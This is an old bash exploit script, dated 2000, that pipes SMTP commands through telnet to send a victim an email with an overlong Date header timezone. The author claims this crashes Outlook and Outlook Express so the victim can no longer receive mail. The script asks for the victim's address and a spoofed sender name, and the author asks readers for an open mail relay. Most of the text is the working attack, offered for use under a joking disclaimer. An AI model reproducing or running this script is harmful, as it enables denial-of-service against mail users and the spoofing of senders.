DISCLAIMER
Blah, blah, blah, and blah blah blah blah:IT WASN'T ME!!!
#!/bin/bash #Outlook Bug..ExploitScript v0.0001 by: # YozD aka Slicker. #----------------------------------------------------------- #How it works: when you send a mail to someone who is using #Outlook; and you make the date very long (like this +11111 #1111111 etc.), Outlook crashes and the victim isn't able #to receive e-mail anymore. #Check: http://www.ussrback.com/labs50.html for more info #************************************************************* # Fill in your smtp server: SERVER=smtp.yourISP.com echo "Outlook Bug..ExploitScriptje v0.0001 " echo "CopyLeft 2000 (c)" echo "-------------------------------------------------------" echo echo "Looks like M$ has another bug in its software!" echo "Systems affected: MS Outlook Express 4.0/4.01/5.0/5.01" echo "MS Outlook 97/98/2000 --> For more info, surf to:" echo "http://www.ussrback.com/labs50.html" echo echo "The Script:" echo "------------" echo "Who's the one that gets the mail? (Type his/her e-mail" echo "address and hit ENTER):" read GEADRESSEERDE echo "Type in the address the person will see as the sender of" echo "the mail:" read SENDER echo "Ok tnx. You're done now. Hit ENTER to send the mail" echo "and exit the program (Telnet will be started and the" echo "information you entered will be filled in)." read TUSSENTOETS (sleep s 3; echo helo buggy; sleep s 3; echo mail from: $SENDER; sleep s 3; echo rcpt to: $GEADRESSEERDE; sleep s 3; echo data; sleep s 3;echo date: Tu,07 Nov 2000 12:33:16 +1111111111111111111111111111111111111111111111111111111111111; sleep s 2;echo Subject: Check this out!!!; sleep s 2;echo You have got buggy software!!!; sleep s 2;echo .;sleep s 2;echo quit) | telnet $SERVER 25
Got any comments? Mail me.
By the way; if someone knows a smtp-server that allows relying, please mail me =)
Gr,
YozD aka Slicker
--=[http://slicker.freeservers.com]=--